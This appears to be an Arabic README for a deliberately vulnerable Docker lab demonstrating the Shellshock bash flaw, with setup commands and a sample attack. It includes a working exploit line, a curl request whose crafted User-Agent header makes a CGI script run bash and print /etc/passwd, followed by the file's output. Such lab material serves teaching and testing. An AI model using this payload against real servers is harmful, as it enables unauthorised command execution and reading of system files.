
الثغرة الأمنية كخدمة: عرض لـ CVS-2014-6271، المعروفة أيضًا باسم Shellshock
نظام لينكس دبيان (Buster) مع إصدار ضعيف من bash وتطبيق ويب لعرض CVS-2014-6271، المعروف أيضًا باسم Shellshock.
تعتمد حاوية docker هذه على دبيان Buster وتم تعديلها لاستخدام إصدار ضعيف من Bash (bash_4.2:2b:dfsg-0.1).
يتوفر تطبيق ويب عبر Apache 2 يقدّم سكربت CGI يشغّل أوامر shell.
ثبّت الحاوية باستخدام docker pull hmlio/vaas-cve-2014-6271
شغّل الحاوية مع تعيين منفذ docker run -d -p 8080:80 hmlio/vaas-cve-2014-6271
يجب أن تتمكن من الوصول إلى تطبيق الويب على http://your-ip:8080/.
يمكن استغلال تطبيق الويب/إصدار bash الضعيف كما هو موضح أدناه:
# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://your-ip:8080/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
استُلهمت الفكرة وتطبيق الويب بشكل كبير من الآلة الافتراضية «Sokar» على VulnHub، التي أنشأها rasta_mouse. لمزيد من التفاصيل يرجى زيارة https://www.vulnhub.com/entry/sokar-1,113/.